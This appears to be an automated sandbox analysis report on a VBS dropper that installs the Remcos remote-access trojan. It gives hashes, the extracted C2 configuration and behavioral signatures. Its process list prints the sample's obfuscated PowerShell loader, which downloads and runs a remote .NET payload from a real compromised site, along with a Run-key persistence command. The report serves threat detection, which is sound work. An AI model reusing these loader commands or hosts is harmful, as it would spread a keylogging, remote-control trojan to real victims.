Analysis
-
max time kernel
147s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
26-09-2024 08:54
Static task
static1
Behavioral task
behavioral1
Sample
sostener.vbs
Resource
win7-20240903-en
General
-
Target
sostener.vbs
-
Size
438KB
-
MD5
e260955361dc0c8454fcfa061a45f6f1
-
SHA1
bb77b8e3ef1c8d30cb5dbb90725d34e3c7602e13
-
SHA256
e9cc243923de94787673438f26c30baefe9995b38c8b8047b95726b998baf26c
-
SHA512
2f6572ecf6169a33c4cd273c0a9d8fd158e4e9230bb3c0489f3ca8bd0884c784d2372dcc09a6438f178ec2e8a27ccd37b1de3771b6a6cc6485d8d220bc3fa202
-
SSDEEP
96:WDT/c7lY88ky0xbFi1msq4VIAGYAjrGzrD5UbF:W3/OlY88kyIhi1msLVIAGYAUvGF
Malware Config
Extracted
https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt
Extracted
remcos
Nlk
comandoespecial2023.duckdns.org:8888
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-3PWW8O
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 9 1132 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_______________________------------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \"" powershell.exe -
pid Process 1220 powershell.exe 1132 powershell.exe 2520 powershell.exe 4864 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1132 set thread context of 880 1132 powershell.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 4864 powershell.exe 4864 powershell.exe 1132 powershell.exe 1132 powershell.exe 2788 powershell.exe 2520 powershell.exe 4344 powershell.exe 2788 powershell.exe 4344 powershell.exe 4344 powershell.exe 2520 powershell.exe 2520 powershell.exe 2520 powershell.exe 1220 powershell.exe 1220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4864 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeDebugPrivilege 4344 powershell.exe Token: SeDebugPrivilege 1220 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 880 RegSvcs.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 4924 wrote to memory of 4864 4924 WScript.exe 89 PID 4924 wrote to memory of 4864 4924 WScript.exe 89 PID 4864 wrote to memory of 1132 4864 powershell.exe 91 PID 4864 wrote to memory of 1132 4864 powershell.exe 91 PID 1132 wrote to memory of 2520 1132 powershell.exe 92 PID 1132 wrote to memory of 2520 1132 powershell.exe 92 PID 1132 wrote to memory of 2788 1132 powershell.exe 93 PID 1132 wrote to memory of 2788 1132 powershell.exe 93 PID 1132 wrote to memory of 4344 1132 powershell.exe 94 PID 1132 wrote to memory of 4344 1132 powershell.exe 94 PID 2520 wrote to memory of 1220 2520 powershell.exe 95 PID 2520 wrote to memory of 1220 2520 powershell.exe 95 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96 PID 1132 wrote to memory of 880 1132 powershell.exe 96
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J▒Bi▒Gk▒awB5▒Gc▒I▒▒9▒C▒▒Jw▒w▒DE▒Mw▒n▒Ds▒J▒Br▒G4▒dwBt▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bj▒HM▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒dwB3▒Hc▒LgBp▒G4▒ZgBv▒HI▒bQBh▒GM▒aQBv▒G4▒bwBw▒G8▒cgB0▒HU▒bgBh▒C4▒YwBv▒G0▒LwB3▒H▒▒LQBj▒G8▒bgB0▒GU▒bgB0▒C8▒dQBw▒Gw▒bwBh▒GQ▒cw▒v▒DI▒M▒▒y▒DQ▒Lw▒w▒Dk▒LwBk▒Gw▒b▒Bz▒Gs▒eQBm▒GE▒b▒▒u▒HQ▒e▒B0▒Cc▒KQ▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒Bu▒HU▒c▒Bj▒HM▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒EM▒b▒Bh▒HM▒cwBM▒Gk▒YgBy▒GE▒cgB5▒DE▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒HQ▒e▒B0▒C4▒cwBv▒GM▒bQBl▒HI▒Lw▒3▒D▒▒Lw▒0▒DI▒M▒▒y▒C8▒cwBk▒GE▒bwBs▒H▒▒dQ▒v▒HQ▒bgBl▒HQ▒bgBv▒GM▒LQBw▒Hc▒LwBt▒G8▒Yw▒u▒GE▒bgB1▒HQ▒cgBv▒H▒▒bwBu▒G8▒aQBj▒GE▒bQBy▒G8▒ZgBu▒Gk▒LgB3▒Hc▒dw▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒bgB3▒G0▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒YgBp▒Gs▒eQBn▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps14⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps15⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:880
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3840,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=4144 /prefetch:81⤵PID:3404
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD55e985a09eb81fc02f92246dc35c15644
SHA19f61bbd3c110d0491369e5d65825c034076d4b17
SHA2566e1e6f33ca8455d401c649a065ede86b8952aeb43205e1abe99ab856a5c5229d
SHA5123a667c366ee5d7ad3dee0b1090f2db9aefda0942b4f9359a894929eabaf1c3f35190cfc76edb8dde95c849c418f647336617058b43b09f39e3432432c8b36000
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
1KB
MD58b56ab7631860454473cf924d0e1da02
SHA1cd3b8705f1008e1a2a19bd363ab0b291fd9ebd38
SHA2565624dd2edd0d950b56787cd937043d9c43ad667ac5471090e21cc0d2313eaa18
SHA512efe7cdf0dad52799a624c33878cacaca5bfeb08bc3fbb78cbdc768b92fa6c83e16b38dfd95a9fa4947d757b9ab276990fee02ae26abdea7b4fd32bf246c74f20
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
265B
MD53613b0cfa9cd66b5bc0bc4aabe147838
SHA194bb2a7ae944b9906f95ac19bd3fd199a4396a6b
SHA2566bc7c43d63f298a0078345bac278b90076521d73259fc34f046df021d738f653
SHA512282e0d1543850ea5affae87b3e66d1ffbf837c1f2c976843874dc6f0746bb989b18b9ff0be74726165cd8dbdb64068d21f9bd44f04eef5764e1f14fccd31698b